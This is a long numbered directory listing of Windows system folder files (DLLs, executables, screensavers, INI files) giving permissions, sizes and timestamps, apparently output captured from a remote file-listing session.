  1884. 100666/rw-rw-rw- 105232 fil 2002-12-31 07:00:00 -0500 rend.dll
  1885. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 replace.exe
  1886. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 reset.exe
  1887. 100666/rw-rw-rw- 40720 fil 2002-12-31 07:00:00 -0500 resutils.dll
  1888. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 rexec.exe
  1889. 100666/rw-rw-rw- 431888 fil 2002-12-31 07:00:00 -0500 riched20.dll
  1890. 100666/rw-rw-rw- 3856 fil 2002-12-31 07:00:00 -0500 riched32.dll
  1891. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 rigpsnap.dll
  1892. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 ripagnt.dll
  1893. 100666/rw-rw-rw- 36624 fil 2002-12-31 07:00:00 -0500 rnr20.dll
  1894. 40777/rwxrwxrwx 0 dir 2017-05-25 06:18:02 -0400 rocket
  1895. 100777/rwxrwxrwx 20752 fil 2002-12-31 07:00:00 -0500 route.exe
  1896. 100666/rw-rw-rw- 22800 fil 2002-12-31 07:00:00 -0500 routeext.dll
  1897. 100777/rwxrwxrwx 22288 fil 2002-12-31 07:00:00 -0500 routemon.exe
  1898. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 router.exe
  1899. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 routetab.dll
  1900. 100666/rw-rw-rw- 24336 fil 2002-12-31 07:00:00 -0500 rpcns4.dll
  1901. 40777/rwxrwxrwx 0 dir 2017-05-25 06:09:59 -0400 rpcproxy
  1902. 100666/rw-rw-rw- 454416 fil 2002-12-31 07:00:00 -0500 rpcrt4.dll
  1903. 100666/rw-rw-rw- 239376 fil 2002-12-31 07:00:00 -0500 rpcss.dll
  1904. 100666/rw-rw-rw- 43008 fil 2002-12-31 07:00:00 -0500 rrasmgmt.msc
  1905. 100666/rw-rw-rw- 20240 fil 2002-12-31 07:00:00 -0500 rrasprxy.dll
  1906. 100666/rw-rw-rw- 132368 fil 2002-12-31 07:00:00 -0500 rsabase.dll
  1907. 100666/rw-rw-rw- 3167 fil 2002-12-31 07:00:00 -0500 rsaci.rat
  1908. 100666/rw-rw-rw- 134928 fil 2002-12-31 07:00:00 -0500 rsaenh.dll
  1909. 100666/rw-rw-rw- 25360 fil 2002-12-31 07:00:00 -0500 rsfsaps.dll
  1910. 100777/rwxrwxrwx 14096 fil 2002-12-31 07:00:00 -0500 rsh.exe
  1911. 100666/rw-rw-rw- 35088 fil 2002-12-31 07:00:00 -0500 rshx32.dll
  1912. 100777/rwxrwxrwx 44816 fil 2002-12-31 07:00:00 -0500 rsm.exe
  1913. 100777/rwxrwxrwx 108304 fil 2002-12-31 07:00:00 -0500 rsnotify.exe
  1914. 100777/rwxrwxrwx 176912 fil 2002-12-31 07:00:00 -0500 rsvp.exe
  1915. 100666/rw-rw-rw- 11932 fil 2002-12-31 07:00:00 -0500 rsvp.ini
  1916. 100666/rw-rw-rw- 3037 fil 2002-12-31 07:00:00 -0500 rsvpcnts.h
  1917. 100666/rw-rw-rw- 21264 fil 2002-12-31 07:00:00 -0500 rsvpmsg.dll
  1918. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 rsvpperf.dll
  1919. 100666/rw-rw-rw- 77072 fil 2002-12-31 07:00:00 -0500 rsvpsp.dll
  1920. 100666/rw-rw-rw- 30480 fil 2002-12-31 07:00:00 -0500 rtipxmib.dll
  1921. 100666/rw-rw-rw- 97040 fil 2002-12-31 07:00:00 -0500 rtm.dll
  1922. 100666/rw-rw-rw- 81168 fil 2002-12-31 07:00:00 -0500 rtrfiltr.dll
  1923. 100666/rw-rw-rw- 22288 fil 2002-12-31 07:00:00 -0500 rtrupg.dll
  1924. 100666/rw-rw-rw- 44816 fil 2002-12-31 07:00:00 -0500 rtutils.dll
  1925. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 runas.exe
  1926. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 rundll32.exe
  1927. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 runonce.exe
  1928. 100777/rwxrwxrwx 17168 fil 2002-12-31 07:00:00 -0500 rwinsta.exe
  1929. 100666/rw-rw-rw- 11024 fil 2003-06-19 22:45:12 -0400 rwnh.dll
  1930. 100666/rw-rw-rw- 49936 fil 2002-12-31 07:00:00 -0500 samlib.dll
  1931. 100666/rw-rw-rw- 389904 fil 2002-12-31 07:00:00 -0500 samsrv.dll
  1932. 100777/rwxrwxrwx 67856 fil 2002-12-31 07:00:00 -0500 savedump.exe
  1933. 100666/rw-rw-rw- 71440 fil 2002-12-31 07:00:00 -0500 scarddlg.dll
  1934. 100666/rw-rw-rw- 123152 fil 2002-12-31 07:00:00 -0500 scardssp.dll
  1935. 100777/rwxrwxrwx 100112 fil 2002-12-31 07:00:00 -0500 scardsvr.exe
  1936. 100666/rw-rw-rw- 114448 fil 2002-12-31 07:00:00 -0500 scecli.dll
  1937. 100666/rw-rw-rw- 254736 fil 2002-12-31 07:00:00 -0500 scesrv.dll
  1938. 100666/rw-rw-rw- 147728 fil 2002-12-31 07:00:00 -0500 schannel.dll
  1939. 100666/rw-rw-rw- 133752 fil 2002-12-31 07:00:00 -0500 schema.ini
  1940. 100666/rw-rw-rw- 162064 fil 2002-12-31 07:00:00 -0500 schmmgmt.dll
  1941. 100777/rwxrwxrwx 14608 fil 2002-12-31 07:00:00 -0500 schupgr.exe
  1942. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 sclgntfy.dll
  1943. 100666/rw-rw-rw- 77584 fil 2002-12-31 07:00:00 -0500 scripto.dll
  1944. 100666/rw-rw-rw- 28432 fil 2002-12-31 07:00:00 -0500 scrnsave.scr
  1945. 100666/rw-rw-rw- 151601 fil 2002-12-31 07:00:00 -0500 scrobj.dll
  1946. 100666/rw-rw-rw- 147512 fil 2002-12-31 07:00:00 -0500 scrrun.dll
  1947. 100666/rw-rw-rw- 72192 fil 2002-12-31 07:00:00 -0500 sdbapiu.dll
  1948. 100666/rw-rw-rw- 149776 fil 2002-12-31 07:00:00 -0500 sdpblb.dll
  1949. 100777/rwxrwxrwx 17168 fil 2002-12-31 07:00:00 -0500 secedit.exe
  1950. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 seclogon.dll
  1951. 100666/rw-rw-rw- 58368 fil 2002-12-31 07:00:00 -0500 secpol.msc
  1952. 100666/rw-rw-rw- 48912 fil 2002-12-31 07:00:00 -0500 secur32.dll
  1953. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 security.dll
  1954. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 sefilshr.dll
  1955. 100666/rw-rw-rw- 24336 fil 2002-12-31 07:00:00 -0500 sendcmsg.dll
  1956. 100666/rw-rw-rw- 18704 fil 2002-12-31 07:00:00 -0500 sendmail.dll
  1957. 100666/rw-rw-rw- 38160 fil 2002-12-31 07:00:00 -0500 sens.dll
  1958. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 sensapi.dll
  1959. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 senscfg.dll
  1960. 100666/rw-rw-rw- 15120 fil 2002-12-31 07:00:00 -0500 serialui.dll
  1961. 100666/rw-rw-rw- 65601 fil 2002-12-31 07:00:00 -0500 servdeps.dll
  1962. 100777/rwxrwxrwx 89360 fil 2002-12-31 07:00:00 -0500 services.exe
  1963. 100666/rw-rw-rw- 23040 fil 2002-12-31 07:00:00 -0500 services.msc
  1964. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 serwvdrv.dll
  1965. 100777/rwxrwxrwx 26896 fil 2002-12-31 07:00:00 -0500 sethc.exe
  1966. 100777/rwxrwxrwx 6416 fil 2002-12-31 07:00:00 -0500 setpwd.exe
  1967. 100777/rwxrwxrwx 55568 fil 2002-12-31 07:00:00 -0500 setreg.exe
  1968. 100666/rw-rw-rw- 31534 fil 2002-12-31 07:00:00 -0500 setup.bmp
  1969. 100777/rwxrwxrwx 27920 fil 2002-12-31 07:00:00 -0500 setup.exe
  1970. 100666/rw-rw-rw- 570128 fil 2002-12-31 07:00:00 -0500 setupapi.dll
  1971. 100666/rw-rw-rw- 417040 fil 2002-12-31 07:00:00 -0500 setupdll.dll
  1972. 100777/rwxrwxrwx 11717 fil 2002-12-31 07:00:00 -0500 setver.exe
  1973. 100666/rw-rw-rw- 95024 fil 2002-12-31 07:00:00 -0500 sfc.dll
  1974. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 sfc.exe
  1975. 100666/rw-rw-rw- 971024 fil 2002-12-31 07:00:00 -0500 sfcfiles.dll
  1976. 100666/rw-rw-rw- 39696 fil 2002-12-31 07:00:00 -0500 sfmapi.dll
  1977. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 sfmatmsg.dll
  1978. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 sfmctrs.dll
  1979. 100666/rw-rw-rw- 2670 fil 2002-12-31 07:00:00 -0500 sfmicon.vol
  1980. 100666/rw-rw-rw- 44816 fil 2002-12-31 07:00:00 -0500 sfmmon.dll
  1981. 100666/rw-rw-rw- 33552 fil 2002-12-31 07:00:00 -0500 sfmmsg.dll
  1982. 100777/rwxrwxrwx 85264 fil 2002-12-31 07:00:00 -0500 sfmprint.exe
  1983. 100666/rw-rw-rw- 601360 fil 2002-12-31 07:00:00 -0500 sfmpsdib.dll
  1984. 100777/rwxrwxrwx 11024 fil 2002-12-31 07:00:00 -0500 sfmpsexe.exe
  1985. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 sfmpsfnt.dll
  1986. 100777/rwxrwxrwx 68368 fil 2002-12-31 07:00:00 -0500 sfmsvc.exe
  1987. 100666/rw-rw-rw- 60 fil 2002-12-31 07:00:00 -0500 sfmuam.ifo
  1988. 100666/rw-rw-rw- 21110 fil 2002-12-31 07:00:00 -0500 sfmuam.rsc
  1989. 100666/rw-rw-rw- 8427 fil 2002-12-31 07:00:00 -0500 sfmuam.txt
  1990. 100666/rw-rw-rw- 60 fil 2002-12-31 07:00:00 -0500 sfmuam5.ifo
  1991. 100666/rw-rw-rw- 46942 fil 2002-12-31 07:00:00 -0500 sfmuam5.rsc
  1992. 100666/rw-rw-rw- 88848 fil 2002-12-31 07:00:00 -0500 sfmwshat.dll
  1993. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 shadow.exe
  1994. 100777/rwxrwxrwx 882 fil 2002-12-31 07:00:00 -0500 share.exe
  1995. 100666/rw-rw-rw- 332288 fil 2002-12-31 07:00:00 -0500 shdoclc.dll
  1996. 100666/rw-rw-rw- 1107728 fil 2002-12-31 07:00:00 -0500 shdocvw.dll
  1997. 100666/rw-rw-rw- 5120 fil 2002-12-31 07:00:00 -0500 shell.dll
  1998. 100666/rw-rw-rw- 2383632 fil 2002-12-31 07:00:00 -0500 shell32.dll
  1999. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 shfolder.dll
  2000. 100666/rw-rw-rw- 16740 fil 2002-12-31 07:00:00 -0500 shiftjis.uce
  2001. 100666/rw-rw-rw- 69392 fil 2002-12-31 07:00:00 -0500 shim.dll
  2002. 100666/rw-rw-rw- 52496 fil 2002-12-31 07:00:00 -0500 shimgvw.dll
  2003. 100666/rw-rw-rw- 289552 fil 2002-12-31 07:00:00 -0500 shlwapi.dll
  2004. 100777/rwxrwxrwx 33552 fil 2002-12-31 07:00:00 -0500 shmgrate.exe
  2005. 100777/rwxrwxrwx 70416 fil 2002-12-31 07:00:00 -0500 shrpubw.exe
  2006. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 shscrap.dll
  2007. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 sigtab.dll
  2008. 100777/rwxrwxrwx 66320 fil 2002-12-31 07:00:00 -0500 sigverif.exe
  2009. 100666/rw-rw-rw- 19728 fil 2002-12-31 07:00:00 -0500 simptcp.dll
  2010. 100666/rw-rw-rw- 15120 fil 2002-12-31 07:00:00 -0500 sisbkup.dll
  2011. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 skdll.dll
  2012. 100777/rwxrwxrwx 45840 fil 2002-12-31 07:00:00 -0500 skeys.exe
  2013. 100666/rw-rw-rw- 217360 fil 2002-12-31 07:00:00 -0500 slbcsp.dll
  2014. 100666/rw-rw-rw- 36624 fil 2002-12-31 07:00:00 -0500 slbkygen.dll
  2015. 100666/rw-rw-rw- 13312 fil 2002-12-31 07:00:00 -0500 slbrsrc.dll
  2016. 100666/rw-rw-rw- 285456 fil 2002-12-31 07:00:00 -0500 smlogcfg.dll
  2017. 100777/rwxrwxrwx 85776 fil 2002-12-31 07:00:00 -0500 smlogsvc.exe
  2018. 100777/rwxrwxrwx 45840 fil 2002-12-31 07:00:00 -0500 smss.exe
  2019. 100666/rw-rw-rw- 11024 fil 2003-06-19 22:45:14 -0400 smtpapi.dll
  2020. 100666/rw-rw-rw- 13584 fil 2003-06-19 22:45:14 -0400 smtpctrs.dll
  2021. 100666/rw-rw-rw- 8002 fil 1999-04-05 22:07:56 -0400 smtpctrs.h
  2022. 100666/rw-rw-rw- 21789 fil 1999-10-01 17:50:10 -0400 smtpctrs.ini
  2023. 100777/rwxrwxrwx 107792 fil 2002-12-31 07:00:00 -0500 sndrec32.exe
  2024. 100777/rwxrwxrwx 68368 fil 2002-12-31 07:00:00 -0500 sndvol32.exe
  2025. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 snmpapi.dll
  2026. 100666/rw-rw-rw- 214288 fil 2002-12-31 07:00:00 -0500 snmpsnap.dll
  2027. 100666/rw-rw-rw- 7952 fil 2003-06-19 22:45:16 -0400 snprfdll.dll
  2028. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 softpub.dll
  2029. 100777/rwxrwxrwx 34064 fil 2002-12-31 07:00:00 -0500 sol.exe
  2030. 100777/rwxrwxrwx 24336 fil 2002-12-31 07:00:00 -0500 sort.exe
  2031. 100666/rw-rw-rw- 262148 fil 2002-12-31 07:00:00 -0500 sortkey.nls
  2032. 100666/rw-rw-rw- 13696 fil 2002-12-31 07:00:00 -0500 sorttbls.nls
  2033. 100666/rw-rw-rw- 1744 fil 2002-12-31 07:00:00 -0500 sound.drv
  2034. 100666/rw-rw-rw- 5632 fil 2002-12-31 07:00:00 -0500 sp2res.dll
  2035. 100666/rw-rw-rw- 4010496 fil 2002-12-31 07:00:00 -0500 sp3res.dll
  2036. 100777/rwxrwxrwx 18192 fil 2002-12-31 07:00:00 -0500 sp4iis.exe
  2037. 100666/rw-rw-rw- 187024 fil 2002-12-31 07:00:00 -0500 spcmdcon.sys
  2038. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 spiisupd.exe
  2039. 40777/rwxrwxrwx 0 dir 2017-05-25 06:09:29 -0400 spool
  2040. 100777/rwxrwxrwx 7952 fil 2002-12-31 07:00:00 -0500 sprestrt.exe
  2041. 100666/rw-rw-rw- 148992 fil 2002-12-31 07:00:00 -0500 spxcoins.dll
  2042. 100666/rw-rw-rw- 15993 fil 2002-12-31 07:00:00 -0500 sqlsodbc.hlp
  2043. 100666/rw-rw-rw- 524560 fil 2002-12-31 07:00:00 -0500 sqlsrv32.dll
  2044. 100666/rw-rw-rw- 119056 fil 2002-12-31 07:00:00 -0500 sqlstr.dll
  2045. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 sqlwid.dll
  2046. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 sqlwoa.dll
  2047. 100777/rwxrwxrwx 199952 fil 2002-12-31 07:00:00 -0500 srvmgr.exe
  2048. 100666/rw-rw-rw- 83728 fil 2002-12-31 07:00:00 -0500 srvsvc.dll
  2049. 100666/rw-rw-rw- 209168 fil 2002-12-31 07:00:00 -0500 srvwiz.dll
  2050. 100666/rw-rw-rw- 138000 fil 2002-12-31 07:00:00 -0500 ss3dfo.scr
  2051. 100666/rw-rw-rw- 47888 fil 2002-12-31 07:00:00 -0500 ssbezier.scr
  2052. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 ssflwbox.scr
  2053. 100666/rw-rw-rw- 38672 fil 2002-12-31 07:00:00 -0500 ssmarque.scr
  2054. 100666/rw-rw-rw- 419600 fil 2002-12-31 07:00:00 -0500 ssmaze.scr
  2055. 100666/rw-rw-rw- 36624 fil 2002-12-31 07:00:00 -0500 ssmyst.scr
  2056. 100666/rw-rw-rw- 102160 fil 2002-12-31 07:00:00 -0500 sspipes.scr
  2057. 100666/rw-rw-rw- 33040 fil 2002-12-31 07:00:00 -0500 ssstars.scr
  2058. 100666/rw-rw-rw- 62736 fil 2002-12-31 07:00:00 -0500 sstext3d.scr
  2059. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 staxmem.dll
  2060. 100666/rw-rw-rw- 68368 fil 2002-12-31 07:00:00 -0500 stclient.dll
  2061. 100666/rw-rw-rw- 16896 fil 2002-12-31 07:00:00 -0500 stdole2.tlb
  2062. 100666/rw-rw-rw- 7168 fil 2002-12-31 07:00:00 -0500 stdole32.tlb
  2063. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 sti.dll
  2064. 100666/rw-rw-rw- 47888 fil 2002-12-31 07:00:00 -0500 sti_ci.dll
  2065. 100666/rw-rw-rw- 83216 fil 2002-12-31 07:00:00 -0500 sticpl.cpl
  2066. 100777/rwxrwxrwx 21264 fil 2002-12-31 07:00:00 -0500 stimon.exe
  2067. 100777/rwxrwxrwx 61712 fil 2002-12-31 07:00:00 -0500 stisvc.exe
  2068. 100666/rw-rw-rw- 81168 fil 2002-12-31 07:00:00 -0500 stobject.dll
  2069. 100666/rw-rw-rw- 4208 fil 2002-12-31 07:00:00 -0500 storage.dll
  2070. 100666/rw-rw-rw- 35600 fil 2003-06-19 08:05:04 -0400 storprop.dll
  2071. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 streamci.dll
  2072. 100666/rw-rw-rw- 246544 fil 2002-12-31 07:00:00 -0500 strmdll.dll
  2073. 100666/rw-rw-rw- 93702 fil 2002-12-31 07:00:00 -0500 subrange.uce
  2074. 100666/rw-rw-rw- 11921 fil 2002-12-31 07:00:00 -0500 subroutn.inf
  2075. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 subst.exe
  2076. 100777/rwxrwxrwx 7952 fil 2002-12-31 07:00:00 -0500 svchost.exe
  2077. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 svcpack.dll
  2078. 100777/rwxrwxrwx 32016 fil 2002-12-31 07:00:00 -0500 syncapp.exe
  2079. 100666/rw-rw-rw- 54032 fil 2002-12-31 07:00:00 -0500 synceng.dll
  2080. 100666/rw-rw-rw- 166672 fil 2002-12-31 07:00:00 -0500 syncui.dll
  2081. 100666/rw-rw-rw- 125712 fil 2002-12-31 07:00:00 -0500 sysdm.cpl
  2082. 100777/rwxrwxrwx 18896 fil 2002-12-31 07:00:00 -0500 sysedit.exe
  2083. 100666/rw-rw-rw- 16656 fil 2002-12-31 07:00:00 -0500 sysinv.dll
  2084. 100777/rwxrwxrwx 37136 fil 2002-12-31 07:00:00 -0500 syskey.exe
  2085. 100666/rw-rw-rw- 172304 fil 2002-12-31 07:00:00 -0500 sysmon.ocx
  2086. 100777/rwxrwxrwx 42768 fil 2002-12-31 07:00:00 -0500 sysocmgr.exe
  2087. 100666/rw-rw-rw- 3214 fil 2002-12-31 07:00:00 -0500 sysprint.sep
  2088. 100666/rw-rw-rw- 3577 fil 2002-12-31 07:00:00 -0500 sysprtj.sep
  2089. 100666/rw-rw-rw- 509712 fil 2002-12-31 07:00:00 -0500 syssetup.dll
  2090. 100666/rw-rw-rw- 3360 fil 2002-12-31 07:00:00 -0500 system.drv
  2091. 100777/rwxrwxrwx 3856 fil 2002-12-31 07:00:00 -0500 systray.exe
  2092. 100666/rw-rw-rw- 194320 fil 2002-12-31 07:00:00 -0500 t2embed.dll
  2093. 100666/rw-rw-rw- 21344 fil 2002-12-31 07:00:00 -0500 tapi.dll
  2094. 100666/rw-rw-rw- 375568 fil 2002-12-31 07:00:00 -0500 tapi3.dll
  2095. 100666/rw-rw-rw- 126736 fil 2002-12-31 07:00:00 -0500 tapi32.dll
  2096. 100666/rw-rw-rw- 46592 fil 2002-12-31 07:00:00 -0500 tapimgmt.msc
  2097. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 tapiperf.dll
  2098. 100666/rw-rw-rw- 309008 fil 2002-12-31 07:00:00 -0500 tapisnap.dll
  2099. 100666/rw-rw-rw- 173328 fil 2002-12-31 07:00:00 -0500 tapisrv.dll
  2100. 100666/rw-rw-rw- 55568 fil 2002-12-31 07:00:00 -0500 tapiui.dll
  2101. 100777/rwxrwxrwx 35600 fil 2002-12-31 07:00:00 -0500 taskman.exe
  2102. 100777/rwxrwxrwx 87312 fil 2002-12-31 07:00:00 -0500 taskmgr.exe
  2103. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 tcmsetup.exe
  2104. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 tcpmib.dll
  2105. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 tcpmon.dll
  2106. 100666/rw-rw-rw- 35586 fil 2002-12-31 07:00:00 -0500 tcpmon.ini
  2107. 100666/rw-rw-rw- 66832 fil 2002-12-31 07:00:00 -0500 tcpmonui.dll
  2108. 100777/rwxrwxrwx 25360 fil 2002-12-31 07:00:00 -0500 tcpsvcs.exe
  2109. 100666/rw-rw-rw- 65808 fil 2002-12-31 07:00:00 -0500 tdc.ocx
  2110. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 telephon.cpl
  2111. 100777/rwxrwxrwx 80144 fil 2002-12-31 07:00:00 -0500 telnet.exe
  2112. 100666/rw-rw-rw- 862 fil 2002-12-31 07:00:00 -0500 termcap
  2113. 100666/rw-rw-rw- 126224 fil 2002-12-31 07:00:00 -0500 termmgr.dll
  2114. 100777/rwxrwxrwx 142608 fil 2002-12-31 07:00:00 -0500 termsrv.exe
  2115. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 tftp.exe
  2116. 100777/rwxrwxrwx 98064 fil 2002-12-31 07:00:00 -0500 themes.exe
  2117. 100666/rw-rw-rw- 187664 fil 2002-12-31 07:00:00 -0500 thumbvw.dll
  2118. 100666/rw-rw-rw- 33552 fil 2002-12-31 07:00:00 -0500 tifflt.dll
  2119. 100666/rw-rw-rw- 61200 fil 2002-12-31 07:00:00 -0500 timedate.cpl
  2120. 100666/rw-rw-rw- 4048 fil 2002-12-31 07:00:00 -0500 timer.drv
  2121. 100777/rwxrwxrwx 207120 fil 2002-12-31 07:00:00 -0500 tlntadmn.exe
  2122. 100777/rwxrwxrwx 55056 fil 2002-12-31 07:00:00 -0500 tlntsess.exe
  2123. 100777/rwxrwxrwx 186128 fil 2002-12-31 07:00:00 -0500 tlntsvr.exe
  2124. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 tlntsvrp.dll
  2125. 100666/rw-rw-rw- 13888 fil 2002-12-31 07:00:00 -0500 toolhelp.dll
  2126. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 tracert.exe
  2127. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 traffic.dll
  2128. 100777/rwxrwxrwx 12560 fil 2002-12-31 07:00:00 -0500 tree.com
  2129. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 trksvr.dll
  2130. 100666/rw-rw-rw- 90384 fil 2002-12-31 07:00:00 -0500 trkwks.dll
  2131. 100777/rwxrwxrwx 257296 fil 2002-12-31 07:00:00 -0500 tsadmin.exe
  2132. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 tsappcmp.dll
  2133. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 tsbyuv.dll
  2134. 100666/rw-rw-rw- 250640 fil 2002-12-31 07:00:00 -0500 tscc.dll
  2135. 100666/rw-rw-rw- 23040 fil 2002-12-31 07:00:00 -0500 tscc.msc
  2136. 100777/rwxrwxrwx 16656 fil 2002-12-31 07:00:00 -0500 tscon.exe
  2137. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 tsd32.dll
  2138. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 tsdiscon.exe
  2139. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 tsec.dll
  2140. 100777/rwxrwxrwx 16656 fil 2002-12-31 07:00:00 -0500 tskill.exe
  2141. 100666/rw-rw-rw- 3286 fil 2002-12-31 07:00:00 -0500 tslabels.h
  2142. 100666/rw-rw-rw- 13213 fil 2002-12-31 07:00:00 -0500 tslabels.ini
  2143. 100777/rwxrwxrwx 15120 fil 2002-12-31 07:00:00 -0500 tsprof.exe
  2144. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 tsshutdn.exe
  2145. 100666/rw-rw-rw- 9488 fil 2002-12-31 07:00:00 -0500 tssoft32.acm
  2146. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 tsuserex.dll
  2147. 100666/rw-rw-rw- 1584 fil 2002-12-31 07:00:00 -0500 tunes.bmp
  2148. 100666/rw-rw-rw- 397584 fil 2002-12-31 07:00:00 -0500 txfaux.dll
  2149. 100666/rw-rw-rw- 84240 fil 2002-12-31 07:00:00 -0500 txflog.dll
  2150. 100666/rw-rw-rw- 177856 fil 2002-12-31 07:00:00 -0500 typelib.dll
  2151. 100666/rw-rw-rw- 60 fil 2002-12-31 07:00:00 -0500 uaminst.ifo
  2152. 100666/rw-rw-rw- 189566 fil 2002-12-31 07:00:00 -0500 uaminst.rsc
  2153. 100666/rw-rw-rw- 83216 fil 2002-12-31 07:00:00 -0500 ufat.dll
  2154. 100666/rw-rw-rw- 261392 fil 2002-12-31 07:00:00 -0500 ulib.dll
  2155. 100666/rw-rw-rw- 27920 fil 2002-12-31 07:00:00 -0500 umandlg.dll
  2156. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 umdmxfrm.dll
  2157. 100666/rw-rw-rw- 88336 fil 2002-12-31 07:00:00 -0500 umpnpmgr.dll
  2158. 100666/rw-rw-rw- 89588 fil 2002-12-31 07:00:00 -0500 unicode.nls
  2159. 100666/rw-rw-rw- 204048 fil 2002-12-31 07:00:00 -0500 unimdm.tsp
  2160. 100666/rw-rw-rw- 68368 fil 2002-12-31 07:00:00 -0500 unimdmat.dll
  2161. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 uniplat.dll
  2162. 100777/rwxrwxrwx 4880 fil 2002-12-31 07:00:00 -0500 unlodctr.exe
  2163. 100666/rw-rw-rw- 321296 fil 2002-12-31 07:00:00 -0500 untfs.dll
  2164. 100777/rwxrwxrwx 312080 fil 2002-12-31 07:00:00 -0500 upg351db.exe
  2165. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 ups.exe
  2166. 100666/rw-rw-rw- 18704 fil 2002-12-31 07:00:00 -0500 ureg.dll
  2167. 100666/rw-rw-rw- 84240 fil 2002-12-31 07:00:00 -0500 url.dll
  2168. 100666/rw-rw-rw- 453392 fil 2002-12-31 07:00:00 -0500 urlmon.dll
  2169. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 usbmon.dll
  2170. 100777/rwxrwxrwx 47808 fil 2002-12-31 07:00:00 -0500 user.exe
  2171. 100666/rw-rw-rw- 403216 fil 2002-12-31 07:00:00 -0500 user32.dll
  2172. 100666/rw-rw-rw- 389904 fil 2002-12-31 07:00:00 -0500 userenv.dll
  2173. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 userinit.exe
  2174. 100666/rw-rw-rw- 315664 fil 2002-12-31 07:00:00 -0500 usp10.dll
  2175. 100777/rwxrwxrwx 1161 fil 2002-12-31 07:00:00 -0500 usrlogon.cmd
  2176. 100777/rwxrwxrwx 310544 fil 2002-12-31 07:00:00 -0500 usrmgr.exe
  2177. 100666/rw-rw-rw- 26384 fil 2002-12-31 07:00:00 -0500 utildll.dll
  2178. 100777/rwxrwxrwx 22800 fil 2002-12-31 07:00:00 -0500 utilman.exe
  2179. 100666/rw-rw-rw- 18832 fil 2002-12-31 07:00:00 -0500 v7vga.rom
  2180. 100666/rw-rw-rw- 30749 fil 2002-12-31 07:00:00 -0500 vbajet32.dll
  2181. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 vbisurf.ax
  2182. 100666/rw-rw-rw- 438330 fil 2002-12-31 07:00:00 -0500 vbscript.dll
  2183. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 vcdex.dll
  2184. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 vdmdbg.dll
  2185. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 vdmredir.dll
  2186. 100666/rw-rw-rw- 9008 fil 2002-12-31 07:00:00 -0500 ver.dll
  2187. 100777/rwxrwxrwx 63760 fil 2002-12-31 07:00:00 -0500 verifier.exe
  2188. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 version.dll
